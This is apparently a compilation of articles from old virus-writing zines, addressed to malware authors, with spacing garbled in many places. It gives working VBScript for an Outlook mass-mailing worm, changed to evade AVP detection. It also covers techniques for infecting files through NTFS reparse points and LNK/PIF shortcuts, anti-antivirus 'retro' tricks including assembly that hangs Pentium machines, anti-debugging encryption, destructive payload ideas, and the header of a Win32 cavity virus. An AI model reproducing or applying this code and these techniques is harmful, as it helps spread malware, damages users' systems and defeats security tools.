BOOL DeviceIoControl( (HANDLE) hDevice, // handle to a file FSCTL_SET_ZERO_DATA, // dwIoControlCode o peration (LPVOID) lpInBuffer, // pointer to FILE_Z ERO_DATA_INFORMATION (DWORD) nInBufferSize, // size of input buf fer NULL, // lpOutBuffer; must be NULL 0, // nOutBufferSize; m ust be zero (LPDWORD) lpBytesReturned, // number of bytes r eturned (LPOVERLAPPED) lpOverlapped // OVERLAPPED struct ure
typedef struct _FILE_ZERO_DATA_INFORMATION { LARGE_INTEGER FileOffset; LARGE_INTEGER BeyondFinalZero;} FILE_ZERO_DATA_INFORMATION, *PFILE_ZERO_DATA_INFO RMATION;
And that's all about sparse files for now ...
2.3. Reparse PointsThis thingy is my little favourite :) What are repa rse points? A reparse pointis a block of user defined data associated with a f ile or directory. The contentof that data knows aplication and file system drive r (filter) which will filtrateit. When NTFS wants to open a file and recognises t hat that file has a reparse point it firstly tries to find a file syste m filter which belongs to thatreparse point (in it's structure is a tag ...). If succeeds then passes thatraw data (max 16KB) to that filter and what that dr iver does is on him.The file system driver you install is on the top of file systems drivers. Whatyou intercept depends on you. Do you see it? You ca n do everything with thatfile. You can infect files just by setting reparse point to it. You can changesome datas in that file, store it to reparse point and whenever the file isopened you renew that content and on the file close you reinfect it. Withoutyour file system filter will be in the file broken content ... With this youcan infect !_all_! files! I must say that it is cha rming. But it has someholes. We must find out how to spread the mother (f ile_system_driver). But firstlywe must create that mother :) This will be a little problem becoz we need
IFSkit (kit to write installable filesystem drivers ) and M$ wants too much money(for me ...) for it. If someone has it pls contact me. And it also needs somemore studying. But one time it will come :))
2.4. MountingTo this theme is not so much to say. I think that m ost of ya know mounting fromvarious *nix systems such as Linux. If you want to set a volume point you willneed 3 functions.
GetVolumeNameForVolumeMountPoint, SetVolumeMountPoi nt and sometimesDeleteVolumeMountPoint.
If you want documentation, lemme know. I'll give it to you.Just one thing to mention. In *nixes is this featur e implemented for 30 years.Micro$oft implemented it now. That means 30 years h ole between technologies??Everyone must answer this question on his own :))
That's all for now about NTFS5. There's more to say in each of that themes Iwas talking about in this article but i think it is enough for the beginning.Just code and study and if you will have problems c ontact me. If I can helpyou (==if I will know it) I will help you.
3. Job kernel objectYou have problems while managing processes in your virus? Your virus uses IPCand creates a lot of processes and you want and com fort way how to destroy themall? In Win2k you can use a Job kernel object which lets you to group processestogether and create a sandbox that restricts what t hese processes are allowedto do. Then you can destroy all the processes just by destroying the Job object.Let's go deeper.
First you must create a job object. This can be don e via CreateJobObject api fc.
HANDLE CreateJobObject( LPSECURITY_ATTRIBUTES lpJobAttributes, // SD (ca n be null for our purposes) LPCTSTR lpName // job na me (if null then job is); // a noname job :))
So now we have created a job and we have handle for it. Now we must assign someprocess to it. Just use AssignProcessToJobObject .. .
BOOL AssignProcessToJobObject( HANDLE hJob, // handle to job HANDLE hProcess // handle to process);
Easy. Now we can place some restrictions to the pro cesses within the job butthat's not so necessary for now. I promised termina ting of all processes via oneapi fc rite? Here it is ...
BOOL TerminateJobObject( HANDLE hJob, // handle to job UINT uExitCode // exit code);
After calling this function with rite job handle wi ll be all processes withinthe job terminated.
4. Otherz- in Win2k Toolhelp32 library is implemented. You c an again use fc as CreateToolhelp32Snapshot, Process32First etc. It is very usefull when writing for Win9x and Win2k a per(multi)-process residency. In WinNT you can use only EnumProcesses and EnumProcessModules from psapi until now.
These two functions weren't in Win9x so there wer e double code in viruses for both operating systems.- for easier access to registry you can use functio ns from Shell Light Weight API (shlwapi.dll). These functions are:
SHDeleteEmptyKeySHDeleteKeySHDeleteValueSHGetValueSHSetValueSHQueryValueExSHEnumKeyExSHEnumValueSHQueryInfoKeySHRegGetBoolIUSValue
e.g. to read a subkey, you had to open registry s ubkey, call RegQueryValueEx and then close the registry key. SHGetValue does everything in one step.- when you are infecting a file check it with SFCIs FileProtected which will tell you whether the file is protected or not. (I'm wr iting an article about how to fuck SFP and then it will be easier :))- if you want to go to some system directories such as system32 etc. use fc ExpandEnvironmentStrings which let you use env ironment variables. E.g. until now you had to get windows directory and th en paste system32. But now you just use %system32% environment variable whic h you pass to Expand ... that will return expanded path.
DWORD ExpandEnvironmentStrings( LPCTSTR lpSrc, // string with environment variabl es LPTSTR lpDst, // string with expanded strings DWORD nSize // maximum characters in expanded string );
5. EndI need rest !!!If you aren't crazy after reading this article then you are not normal :)For such people a little song:
Settle for nothing
A jail cell is freedom from the painin my home
Hatred passed on, passed on andpassed on
A world of violent rageBut it's one that I can recognizeHaving never seen the color of my
father's eyesYes, I dwell in hell but it's a hell
that i can gripI tried to grip my familyBut I slipedTo escape from the pain and an
existence mundaneI gotta 9, a sign, a set and now I
gotta name
Read my writing on the wallNo one's here to catch me when I
fallBut death is on my sideSuicide!!!!!!
Read my writing on the wall
No one's here to catch me when Ifall
Caught between my culture and thesystem
Genocide!!!!!!
Read my writing on the wallNo one's here to catch me when I
fallIf ignorance is blissThen knock the smile off my face
If we don't take action nowWe settle for nothing laterWe'll settle for nothing nowAnd we'll settle for nothing later
Do you know who sings this? It's my beloved song fr om my beloved group. Ifyou know name of that group tell it to me on #virus and you will get a prize.(well still dunno what the prize will look like but you will :))
And that's all for now ... If you'll find any error s just contact me pls.Thx for reading!
Ratter ([email protected]) - I'm a stranger in the wo rld i haven't made.
A few ideas for viruses
Kalkin/EViL
These are difficult times for us, virus writers. No , I don't mean the cops, society or the press. I mean the process of writing a virus. Yes, there are tons of materials about this subject and quite some people who can help, but tha t's usually by a technical problems. What if you want to do something radically new? It's act ually not so easy coz everything has already been done: polymorphic macroviruses, ACCESS infection, LINUX-viruses. You can realize some parts of the virus in a never-seen-bef ore way, but these parts are mainly only some solutions to some x technical problems. But yo u want to do something NEW and INTERESTING, something like the spying virus from C odeBreakers or the payload of CIH. Maybe this article will help you.
.LNK and/or .PIF infection
Maybe this has already been done, but I haven't hea rd about it (on the other hand, I'm not too informed about what goes on in the scene). Anyw ay, if it's so then the credit goes to the one who had this idea.
Like you all know .LNKs are small link files, so ca lled shortcuts, that were presented with Windows 95 (in Microsoft's OS world) and should eli minate the need to copy one program into several folders. .PIFs are basically the same, just they also contain usefull loading information and are for DOS programs. Both formats contain the path of the original program. It wouldn't be hard to replace this path with the p ath to our infected file, which would execute after it's actions the real program. This w ould be like some kind of companion virus. It would be even better, coz how many AV pro grams check for changes in .LNK/.PIF files? Another plus is that this infecting method b asically works on every OS where are .LNKs (LINUX for example). The only problem is that a virus which uses just this method of infecting won't spread to any other computer (it wi ll "travel" only if somebody for some x reason copys our file to another PC). But this meth od can be used to increase the change of executing the virus, especially in the case of runt ime viruses.
Alias "infection"
This idea is based on the previous one and works on DOS (under 4DOS and NDOS) and *NIX systems (I think). A virus could set some aliases t o itself and after infecting some files execute the original program.
Name changing What if a DOS virus hooks INT 21h, sa ves and then changes the name (set by exec, found by findfirstfile) to the name of an inf ected file (in memory)? The infected file would be executed, copied to disk, included in a ZI P archive. If the proper code is included then this viralized item wouldn'd be opend for edit ing (the real one would). The same could do a WIN virus. And this method is better for sprea ding than the above two.
Infection of format programs
This idea was originally by MiKE The Hacker/TPT Gan g and describes a hybrid virus, that infects formatting programs and modifies them so th at they put the same virus on the bootsector of formatted disk. This would be better then just a bootsector-infector, coz you can't get rid of the virus by re-formatting the dis k (atleast with this formatter). Reboot won't help eighter. This idea can be enhanced: infe cting of CD writing programs, so that an AUTORUN.INF and an infected file would be written t o CD. It should be a little bit easier (no need for a hybrid virus) and also better, coz t here's no way you can get rid of the virus on CD (unless you're burning CD-RWs). Disadva nages: not too few formatting/CD-burning programs exist.
Intel Pentium Pro fucking
I came to this idea when I was surfing through Ralf Browns Interrupt List. There's written, that by using interrupt 15h and seting AX to D042h it's possible to install a microcode patch into the Pentium Pro processor. I haven't che cked this and have no idea how much can the patch effect the CPU, so I don't know if the pr oper code will really fuck the processor
or will it do nothing. It's too bad that there aren 't so many Pentium Pros around, coz there seems to be CIH potetial."Collection" viruses
This idea was inspired by GriYo/29A's SIMBIOSIS pro ject. If you don't know what it is then: it outputted a polymorphing virus on an Internet wo rm that contained SMTP engine. A so called collection-virus is a virus (or worm) that c ontains several (let's say 5) viruses which will be released in a random order.
"Part-upgrading" viruses
Those viruses would have a "serial number" about ev ery part of itself: the procedure of finding files, polymorphing engine, infecting part. When now such a virus would "meet" another part-upgrading-virus, it would check all se rial numbers and if some of them are newer than it's own, it would copy the updated proc edure to itself. But when it finds a part that it doesn't have then the virus would copy the part to itself and add a call or jump to it. So basically those viruses expand themselves. A direct action COM infector could for example add to itself parts to go TSR and infect EX Es.
Quotating viruses
It's a lame and not new idea. Such a virus would as payload display quotations of some famous person. For example Sokrates's. The good thi ng is that there are MANY people who have said something (I never said it should be something smart or meaningfull).
Intro/demo viruses
I don't mean here product demos, but graphics demos like they are presented on demo-parties and compos (check http://www.hornet.org to get the picture). Intro-viruses would play such videoeffects as payload. Advantages: usually small size, nice, different (what do you think, will people remember better a lame textmode "Infect o-ViruZ" in black and white or a "IntroVirus" in 24 bit colours companioned by breat h-taking-beautiful moving clouds?)
Simulating anti anti-virus viruses
Most viruses today have retro abillities, but I'm t alking about a virus, that is specially coded to destroy anti-virus programs. It would turn off resident AV monitors, install troyans in anti-viruses (*.AVC and TBSCAN.DEF infec tion). It would also overwrite part of AV programs by installing itself in them and then simu late that the AV scans. There are several viruses that patched the "File system" status on Tb Scan's output to hide the fact that it suddenly used DOS services to read the disk. A SAAV virus would for example execute the graphics procedure to display message "Scanning for known viruses in memory" by F-Prot/DOS but then just wait for some time. It would use the necessary procedure to bring up the scanning window, display filenames and instead of c hecking infect them. Or for example display "Checking partition table" by ThunderByte P artition (created by TbUtil) and check nothing. It could be like the real AIDS, which does n't kill, it just destroys the immunity system and makes the way free for other deseases. I t doesn't take much code to do so, just some small patches. The problem is how the virus fi nds what to patch coz AV companies would change the inner structure of the program with ever y new version. At this moment the fact, that most AV programs don't let to encrypt/compress themselves (coz of the CRC check), comes real handy.
Simulating viruses
Based on the above idea these viruses would install themselves in some specific programs and then simulate. One example could be PGP (so that th e signature is always GOOD, and goodbye to trustfull software). It could also be one virus that patches several products.
"Expensive" viruses
It's actually a image of what happened here in Esto nia: quite some Internet users recived a file called Estonia.Exe This was a SFX ZIP and cont ained a client program for some sex-server. Anyway, after executing the program did also some other things and as a result
the PC began to connect to Net through a Malaysian (if I remember correctly) server, which had quite high prices. Nobody knew it and everyone was REALLY surprised when in the end of the month the telephone bill was HUGE. There were t alks that this was a virus, but most (including specialists) don't think so. It seems th at it was just a troyan. But, this idea can be used in viruses (a good way to compromize th e lamest ISP near you).
Destroying the PC-speaker
As last a destructive payload from KUTT/TPT Gang. T he idea is based on the fact that speakers may get damaged when the music is too loud . KUTT though that it would be interesting if a virus did that to PC-speaker: gene rate a high and loud sound and play it quite some time. It's probably technically impossib le to realize, but who knows? An enhanced version of this idea is to damage the speakers that are connected to the sound card. This should actually be more realistic, coz usually the hardware of a sound card is capable of that and the speakers aren't made for this situatio n.
The protector scene
Kalkin/EViL
There are many sub-cultures in the computer world: hackers, demo-coders, musicians, graphicans, virusauthors, crackers. And there's als o a not so well knows scene: the protector-scene. It mostly consists of crackers. So what do these protector guys do? They research ways how to defeat debuggers/code analyzer s/emulators/disassemblers and write programs that use these ways to protect COM and EXE files. Why am I telling this? Because there's been quite some talk about anti-byte techni ques, the advantages of slow polymorphism and other ways to make the detecting and/or disinfe cting of virus harder. But almost nothing has been said about anti-debug tricks, even if thos e are REALLY important. Already in number 4 (or was it number 6?) of 40hex was an article abo ut ADcode. Samples there were for confusing the reading of code. But the methods have involved FAR beyond that. Nowadays the protecting part uses stack tricks to crash debugger s, changes between protected and real mode, checks memory, calculates checksums, debugs a nd emulates it self, relocates the code in memory, opens the original file and checks it fo r changes. The protectors contain polymorphic engines (I've seen all better known MTE s in them: TPE, ViCE, MtE, DAME, etc.). They have become really powerfull. But they still r esemble to viruses: become executed first, do their stuff, clean up, execute the real p rogram. Some of these protectors are REALLY hard to crack, even really good crackers hav e a problem with them. I come to the point now: what do you think, how many really good crackers are there among AVers? Sure, they know debuggers and dissemblers, but that's not enough to be a good cracker. What now if some hard AD code, so hard that even the best crack ers have problems with it, has been used in your virus? Wouldn't the AVer, who gets a sample of it, have some sad times, sitting up all night and trying to decrypt the virii? But how can a viruswriter get this kind of code? For our luck, exactly like in viral business, there are many sourcecodes available. And there's also an another reason why to check protect ors: quite a lot of them check the executable for changes. It's no problem when your v irus is resident and has stealth capabillities, but if you coded a runtime virii the n you're fucked. This can be changed by adding code that prevents the virii from infecting protected files. Ofcourse there's a third reason: use the encryption routines of a protector for crypting the virus. Or you can encrypt the file with this code and insert another decryptor, which decrypts your virii, into the main decryptor. The main coal is that AVP for example (seems to be the AV which can unpack the most executable compressors and decrypto rs) scans the file (finds no viral infection), finds the protector, unpacks it, scans the unprotected file (and finds again no virus). A (possilbly) good example of the code prod uced by the protector scene are EliCZ device drivers - ExDs. They are VxDs that are execu ted in DOS, work their way up to ring0 and stay there. Plus points: undetectable (or that' s atleast what EliCZ claims). Why can't we use this technology in our virii? But check out the things yourself. You just need access to Internet and the following address: http://www.s uddendischarge.com
Katja Kladnik (Lucky Lady)
Richard Karsmakers
"Make haste slowly." Suetonius, "Lives of the Ceasa rs"ST NEWS VOLUME 10 ISSUE 2 DEDICATION ARTICLETO KATJA KLADNIK (R.I.P.)by Richard Karsmakers
Some of you will maybe remember me mentioning a gir l from Slovenia by the name of Lucky Lady that contacted me about 18 months ago for the first time. She has occurred in various installations of the ST NEWS virus column.As you may recall, she had decided to contact me in a reaction to my "Ultimate Virus Killer", which had in some way caused her to start a kind of 'competition' with her designing and spreading computer viruses and me try ing to find and kill them. She sent me each of her creations so that I could update the "U ltimate Virus Killer" recognition algorithms. Although I certainly didnt't approve of all these things she did nor the way she involved me in it, all I could do was play along wi th the game. I couldn't contact her in return, because she always sent her packages anonym ously.As 1994 was coming to its close, it became apparent that she had left the Atari community and was now concentrating more on the PC side of th ings. Also, quite suddenly she contacted me via electronic mail. Though I still didn't know her name, I could now at least send messages back to her. Especially with her having le ft the Atari virus creation scene, something happened which I had not considered possi ble: Our email messages became more casual and even personal.Gradually I found our that her real name was Katja Kladnik, who had lost her parents in the Yugoslavian war, though Slovenia was now no longer a war zone. She now lived with foster parents and studied pyschology at the University of Ljubljana, the capital of Slovenia. She was - I know this may sound strange to some of you, especially those struck by any of the viruses she has created - a really fascinating pers on who had a lot of hidden depths to her personality. We exchanged email messages with quite some regularity, usually involving topics like music, culture and, occasionally, virus es. I always wondered why she had found it so challenging to create computer viruses and st art this semi- friendly "virus war" with me, a question that she could never really reply to satisfactorily.
Around spring of this year I noticed her messages g etting increasingly gloomy and depressing. She even said, at several occasions, th at she wouldn't mind being dead or something. I never knew what triggered this doom an d gloom, though it might have been her boyfriend leaving her some time earlier. There was nothing I could do about it, either. Believe me, I tried.When I emailed to her to ask how she was doing, som ewhere around the middle of June, I got a message back after a while from someone else who sa id that, on June 3rd, 11:53 CET, Katja had died at Ljubljana's main hospital of an Atropin e and Scopolamine overdose. Suicide, most likely. She was 22.
Despite the fact that, in theory, Katja "Lucky Lady " Kladnik had started off as something like an enemy, in the course of our correspondence she had become a kind of friend. Especially after she had left the Atari scene, we o pened up to each other and I no longer felt that being in contact with her was in some way morally incorrect what with my being a virus killer programmer and her a (by then ex-) Ata ri virus coder. During the last one or two months she was to me not a virus coder at all, but instead a sad young woman that needed attention and love badly.
Katja, despite the fact that we started off on a re ally wrong foot, you will be on my mind always; not as a virus coder but as the enchanting and fascinating friend that you gradually became.
This issue of ST NEWS is dedicated to the memory of Katja Kladnik.
Anti Avp Vbs I-Worms Detection. By [K]Alamar
In one of the last Updates, the Avp antivirus has added a detecti on for i-Worms that uses theOutlook replication method, used in almost all the Vbs and Js worms, Like the I Love you,
Bubbleboy and all of them.Ok, this will made your I-worm undetectable for avp till they add it to the database; i 'm pretty sure that if in your worm you use Outlook re plication you use this code, or one similar:---
Dim fso, wsSet fso = CreateObject( "Scripting.filesystemobject" )Set ws = CreateObject( "WScript.Shell" )Set OApp = CreateObject( "Outlook.Application" )if oapp= "Outlook" thenSet Mapi = OApp.GetNameSpace( "MAPI" )For Each AddList In Mapi.AddressListsIf AddList.AddressEntries.Count <> 0 ThenFor AddListCount = 1 To AddList.AddressEntries.Count *Set AddListEntry = AddList.AddressEntries(AddListCount)Set msg = OApp.CreateItem( 0)msg.To = AddListEntry.Addressmsg.Subject = "Your subject"msg.Body = "The body"msg.Attachments.Add "path to your Worm"msg.DeleteAfterSubmit = TrueIf msg.To <> "" Thenmsg.SendEnd IfNextEnd IfNextend if---
The only thing that you should do is add one line and change another, like here (lines with *are the modified ones):
---Dim fso, wsSet fso = CreateObject( "Scripting.filesystemobject" )Set ws = CreateObject( "WScript.Shell" )Set OApp = CreateObject( "Outlook.Application" )if oapp= "Outlook" thenSet Mapi = OApp.GetNameSpace( "MAPI" )For Each AddList In Mapi.AddressListsIf AddList.AddressEntries.Count <> 0 ThenAddlistCount = AddList.AddressEntries.Count *For AddListCount = 1 To AddlistCount *Set AddListEntry = AddList.AddressEntries(AddListCount)Set msg = OApp.CreateItem( 0)msg.To = AddListEntry.Addressmsg.Subject = "Your subject"msg.Body = "The body"msg.Attachments.Add "path to your Worm"msg.DeleteAfterSubmit = TrueIf msg.To <> "" Thenmsg.SendEnd IfNextEnd If
Nextend if---
You should delete the "*" if you want the worm to work.I think that if you know something about I-Worms you should understood what i did; i justcreate a new variable, AddlistCount , and make it be like the number of addressentries, andthen i use that new variable in the next line.
I hope you understood This.[K]Alamar - [email protected] Virii ArgentinaHttp://www.virii.com.ar
--==< Retro the easy way. >= =--
By MidNyte, February 2000
What is a Retro-virus?-------------------------
A Retro-virus is any virus that attacks an tivirus programs, whether generically or just specific programs. It is genera lly used to disable or fool one or more of the popular antivirus programs. For instance, a certain virus will detect if a certain on-access scanner is in memory, and will issue the correct call to shut it down if it is. Another will patch the resident part of the scanner that decides whether to scan a file or not and makes it decide not to in all cases. These are very useful functions, but if you're not of the ability to be able to work out these methods for yo urself, you are left with the choice of: leaving retro-functions out of your virus, using other peoples routines (which are therefor not new) or trying s omething different. That is what this tutorial is about, a few simple ide as that will give basic retro-functionality without the need to be too far advanced in coding. All you need is some basic anti-emulation skills.
What's the theory?---------------------
So how do we get Retro without learning it all? Basically we find ways to annoy the user so much that he does the job of disa bling the antivirus program for us. If we slow him down when he scans he wi ll probably eventually only scan overnight, giving us a day to spread. If we make the program crash he probably won't bother scanning it again, he'll just add it to the ignore list. (It's not that uncommon to find a file that can't be scanned without crashing on a Microsoft machine :)
How do we implement it?--------------------------
You remember reading that a good emulator will save it's place when it finds a decision-based jump? That way, if the code does a check of something and then quits if the condition is met, the emula tor can just go back and pretend the condition wasn't met and see what it can find down the other branch of the program. This is to defeat the technique of quitting when finding an emulator. How about we stop that ? How about we do our anti-emulation bit and then test it, but if we'r e being emulated instead of just quitting, we crash the program? Or better st ill, if we're on a pentium, why not just hang the machine? It's what the 'foof' bug is there for :) If the machine hangs, the antivirus program has no chanc e to return to the jump and try the other branch and the user will probably not bother scanning it again. If he does, the same thing will happen again and again, the user will never get a complete scan. Here's a rough guide to the code needed, assuming that you have in place a suitable emulation-detection ro utine:
cmp ax,028h ;our test for emulation je not_emulated ;jump if equal db 0F0h,00Fh,0C7h,0C8h ;this will hang most penti um machines, it's
;known as the 'foof bug' for obvious reasons.
not_emulated: ;here we are safe from the AV program
How many end users are going to restart the com puter and try scanning that file again when the last time it hung the computer? In the Microsoft age of idiot-friendly operating systems, not many. If they don't know what's going on and the machine hangs, they just won't do it again. If they do once, they won't twice. Take the virus hoax emails that con stantly do the rounds, most people know better to respond and forward the mai l, but the fact that they carry on spreading shows just how many idiots the re are out there who are capable (just about) of using a computer. These are the people who will not scan your file but simply add it to the ignore list , leaving it to go about it's business.
Another method is the time wasted method. Again it's down to annoying the user so much they don't bother scanning. If you can go round enough loops when you find emulation that the scanner takes minutes j ust to scan one file, the scanner will probably only be run overnight and ta ken off constant background monitoring. That gives you a day to spread, and spr ead un-noticed.
Contact----------
Comments/questions/suggestions/bug reports/etc. are welcomed as always, as long as it is kept reasonable. - MidNyte
As always, I welcome ANY feedback, good or bad, a s long as it is reasonable.
| [email protected] | www.coderz.org/midnyte | www.shadowvx.com/midnyte |
--==< How to become the world's riche st man >==--
By MidNyte, June 1999 (Appr ox).
Microsoft are rumoured to have stated that they will use unlimited resources and funds to find the author of the VB S/Monopoly worm. The worm carries a message accusing Bill Gates of monopoly and includes a satirical picture of Bill Gates' head on the Waddingtons character featured on a monopoly board. This particular worm is much less of a security risk to the user than other viruses. Surely everyone can see t his is a case of bruised millionaire's ego? Why does no-one point out to Bill that the worm spreads through the almost unbelievable lack of security that Microsoft products offer? Why not, Mr. Gates, use unlimited funds and resources to FIX your defective products? Why not, Trading Standards, m ake him make his product do what it claims to do, and while you're at it, make him either make it secure, or make him warn people of the security risk? This is the worlds richest man, who owns one of the worlds biggest companies, and that is how he got rich, by writing a half-product and managing to sell it for a huge price. Money that should have gone into making the products what th ey claimed to be went into Bill's back pocket instead. We now have proof in t his retaliation to a simple worm that to Bill Gates, his ego is worth billions, his customers are not. The virus didn't prove your guilt Bill, it didn't need to. Your reaction leaves us in no doubt.
--==< An Introduction to Encryption, Part III >==--
Is an impenetrable encryption p ossible?.
By MidNyte, February 2000
A short (and over-simplified) history of the vir us--------------------------------------------------- --
First of all came the un-encrypted virus. Then came virus scanners, which were basically just hex searchers looking for str ings of hex only found in certain viruses. Viruses retaliated by coming up wi th encryption. Most of the virus is encrypted, and a small decryption engin e at the start of the virus decrypts the virus body. As the encryption chan ges each time, the virus scanner is limited to searching for a much smaller section of code inside the constant decryptor. This wasn't much of a problem for virus scanners though. Viruses fought back again with polymorphism, this is essentially a way that a virus can change it's decryptor every time it infec ts a new file. That way no constant strings appear in the virus. Virus scanne rs came up with two ways to combat this, heuristics and emulation. Heuristics is simply looking for code that looks 'virus-like' This can be something as si mple as the string '*.exe'. Emulation is the controlled running of the program instruction by instruction (not quite, but close enough for this article). A v irus, under emulation, will be allowed to run just enough to decrypt itself and reveal it's code for either a straightforward scan or a generic (heurist ic) scan. Anti-emulation is the viruses way of defeating this, it is a basicall y a way to detect emulation in progress and act accordingly. Some anti-emulati on systems are incorporated into the decryptor of a virus, so that if the viru s is being emulated it will not decrypt properly and hence not reveal it's code . Another defence the virus can use is anti-debugging, which is designed to hin der people who try to debug (in this case unencrypt) your code. This is diff erent in that it doesn't defend the virus from antivirus programs, it defe nds it from the antivirus companies, the people who will try and study the v irus and work out a way to detect it. Anti-debugging can be very simple, like turning off the keyboard interrupts at the start of the code and back on ag ain at the end or it can be quite complicated, with the actual anti-debugging r outine also being used as a key to decryption to protect against patching. Thi s is the focus of this article.
Anti-debugging: more detail------------------------------
Anti-debugging tricks are basically little pi eces of code that have no overall effect on the running of a virus when bei ng run as normal, but that cause the virus to malfunction, crash or worse when they are run under a debugging environment. The simple example above wa s to turn of the keyboard interrupt at the start of the code, and turn it on again at the end of the virus before control is passed back to the host program. This is simply achieved with:
in al, 020h ; \ or al, 002h ; }Disable Keyboard interrupt out 020h, al ; /
...at the start, and:
in al, 020h ; \
and al, 0FDh ; }Enable keyboard interrupt (FDh = NOT 2) out 020h, al ; /
...at the end. When the virus is run under norma l conditions, the keyboard is only off for a very small time, too small for people to notice. If the program is running under a debugger, as soon as the first few instructions are run the keyboard will no longer work, leaving the person at the debugger with no choice but to reset (at least it used to be in the good old days :) The simple work around for the person debugging was too simply patch over the code that turned off the keyboard with NOPs or other do- nothing instructions. Now the virus would work as normal under a debugg er, without disabling the keyboard. To retaliate from this, the virus started to use it's anti-debugging routine as a key for decryption. The hex string t o turn off the keyboard is 'E4 20 0C 02 E6 20'. If this was one of the de cryption keys, the person debugging could not just replace the instructio ns with NOPs as this would change the key to '90 90 90 90 90 90' and cau se the virus to decrypt incorrectly. This seems like an ideal solution, b ut unfortunately it is not. The whole point of this article is to point out the following fact: Any decryption routine can have it's basic functi onality copied by someone determined to debug it. This means that yo ur routine that uses an antidebugging routine and also uses that routi ne as a key for further decryption could be useless. Let's go through it wi th an example. The original virus looks like this:
start: in al, 020h ; \ or al, 002h ; }Disable Keyboard interrupt out 020h, al ; /
xor si,si
lea bx, start_of_encrypted lea cx, end_of_encrypted sub cx, bx shr cx, 001h
decrypt: mov ax, word ptr [start+si] xor [bx],ax inc si cmp si, offset decrypt jne next_key_word xor si,si
next_key_word: loop decrypt
The pointer to the relevant word of the decryp tion key is kept in si, and means that the key is all the code from 'start:' to 'decrypt:'. This works out as 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'. If the keyboard part was nopped out the key would change to '90 90 90 90 90 90 33 F6 BB 19 01 B9 36 01 2B CB D1 E9', as we've already seen. Wh at the person doing the debugging could do though, is simply take the enc rypted portion of the virus and put it into his own program, only this time the key would be stored as data, not as an executable part of the program, lik e this:
start: xor si,si
lea bx, start_of_encrypted
lea cx, end_of_encrypted sub cx, bx shr cx, 001h
decrypt: mov ax, word ptr [key+si] xor [bx],ax inc si cmp si, offset key_end jne next_key_word xor si,si
next_key_word: loop decrypt
key: db 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'
key_end:
As you can see, the above will decrypt the encry pted section in exactly the same manner, only because the key is stored as data we can change the code as much as we like.
Is an impenetrable encryption possible?------------------------------------------
So then, is it possible to include enough curren t techniques, or to come up with a new technique to completely eliminate t he chance of the antivirus programmers being able to decode it? Many people t hink that they have found a way to ensure that their program is completely i mpenetrable to decryption unless it is running at the time. This is, unfo rtunately, unachievable in theory. Because of the above demonstrated techn ique, any anti-debugging technique can be overcome by someone with enough time to debug a program by hand. This means that *any* anti-debug code you put into a virus can be got around eventually because the person debugging ca n always read what is going on in a hex editor and make a new routine to simu late it, hence the routine you write will not always be used to decrypt the co de. They will only see one layer of decryption at a time, however, and thi s is the key to making in impenetrable encryption.
Conclusion-------------
In the end then, we can never make it *imposs ible* for a researcher to decrypt a virus through programming tricks, however we can make it *impractical* through the use of scale, ie, we ca n use so many layers and different tricks that it is impractical to debug. I f it takes a week for a programmer to decrypt a virus with hundreds of laye rs of encryption, they may be able to justify it. If they have ten viruses of this kind it gets harder to justify, and with a hundred of them it starts to get impractical. The ball would be back in their court.
Contact----------
Comments/questions/suggestions/bug reports/etc. are welcomed as always, as long as it is kept reasonable. - MidNyte
As always, I welcome ANY feedback, good or bad, a s long as it is reasonable.
| [email protected] | www.coderz.org/midnyte | www.shadowvx.com/midnyte |
;;ÄÄÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄ¿; ÚÄÜÜÜÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ [ Win32.Infinite Billy Belcebu/iKX ]; ÀÄÛÛÛÄÛÛÛÛÛÛÄÄÄÛÛÛÛÛÄÄ¿ ÚÄÄÄÄÄÄ[ 1699 bytes Ta rget - Win32 Ring3 ]ÄÄÄÄÄÄ; ÚÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ ³ [ 17/07/00 - Made in Valencia, Spain ]; ÀÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÄÄÙ;;;; [ Introduction ];; Welcome to Infinite. This virus has been very ra re for me, as its ambient; of development was very odd. Well, it's my firs t virus using cavity tech,; something that i thought that it was more diffic ult than it really was...; I sincerely doubt that it would work in WinNT fam ily (NT4,W2K), as i havent; been able to test it there (Win2k has some i ncompatibilities with my; 3DFX Voodoo2 and my soundcard), but i didn't want ed to change that thing of; Win32. If it doesn't, i don't care... Blah blah b lah, i've returned from my; laaaarge VX holydays and i've just recently finis hed Forever and this babe.; I hope i haven't lost my awesome code style (bla h, just kidding... i don't; have anything awesome besides the size of my dick - enormous) :); Oh, i almost forgot... I've realized that the c avity technique is stable; most of the times, but it's not perfect, and i s hould do much more compro-; bations before infection than the already existin g ones, but i really don't; care: Windows also has fails in its code and noon e reminds it ;); It's not a special virus in any field, but i want ed to do some cavity stuff; and here it is. Mwaha! ;; [ Features ];; + Cavity virus, searches for holes of zeroe s or INT 3.; + Infect files on current, WINDOWS and WIND OWS/SYSTEM directories.; + Simple & silly 8-byte XOR encryption loop; + Kinda simple EPO with emulator protection; + Checks for SFC protection (if it works in Win2k...); + CRC32 usage (APIs, extensions...); + It's intended to be optimized (not too mu ch, but enough);; [ Greetings ];; This time the greets will go to few ppl. From t he VX scene, to StarZer0,; Wintermute, VirusBuster, Benny, Asmodeus, LifeW ire, Bumblebee, Ypsilon,; and from outside to my best friends out there.Als o to the people that tries ; to make this place we call world a much better pl ace. You rule, guyz.;; [ Infinity - The song ];; Mother watch your children; The iron fist of fear is ruling our lives; It's not too late to change the course; We can make this world a better place to be in;; How much more do we want until we're satisfied?; What happens when we have what we want?; Acquiring more, still there's never enough; We forget those who really are in need; The end is near, or so they say; Selling peace with guns;; Infinity - Where do we go from here?; Infinity - Where do we go from here?; Infinity - Where do we go?; Infinity - Where do we go from here?
